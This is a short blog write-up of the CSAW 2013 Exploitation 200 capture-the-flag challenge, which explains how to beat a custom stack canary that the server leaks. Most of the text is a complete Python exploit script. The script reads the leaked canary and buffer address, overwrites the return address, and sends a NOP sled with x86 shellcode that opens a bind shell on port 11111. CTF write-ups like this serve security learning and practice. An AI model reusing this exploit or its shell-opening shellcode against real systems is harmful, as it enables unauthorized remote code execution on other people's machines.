This level 200 challenge has a very obvious buffer overflow vulnerability but with a little twist, the devious geniuses at ISIS labs implemented their own custom stack canary buffer overflow protection! Well given that it is a 200 level challenge they made things a lot easier by sending us the canary value used and the address of the buffer on the stack. With these two values in hand its a straight forward buffer overflow exploit.

Exploit

import socket
import struct
import time


def pack(addr):
  return struct.pack('<I', addr)

def unpack(addr):
  return struct.unpack('<I', addr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 31338))

#Receive the address of the buffer on the stack
buffer_address = s.recv(5)
buffer_address = unpack(buffer_address[0:4])[0]

#Calculate the offset from the start of the buffer to the location of the shellcode.
#Padding: 2048, Canary: 4, Padding: 12, EIP: 4, NOP sled + payload
#Jump to the middle of the NOP sled
offset = (2048 + 4 + 12 + 4 + 16)

shellcode_addr = buffer_address + offset
shellcode_addr = pack(shellcode_addr)

#Receive the canary.
canary = s.recv(4)

s.recv(1024)


##http://www.shell-storm.org/shellcode/files/shellcode-836.php
##Bind shell on port 11111
payload = ( "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02"
          "\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68\x2b\x67"
          "\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x89"
          "\x51\x04\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43"
          "\xcd\x80\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79"
          "\xf8\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62"
          "\x69\x6e\x89\xe3\x41\xcd\x80")

s.send("A"*2048 + canary + "AAAABBBBCCCC" + shellcode_addr + "\x90"*64 +payload)


s.close()

ramblings of an aspiring hacker

CSAW Exploitation 200 [2013]

Exploit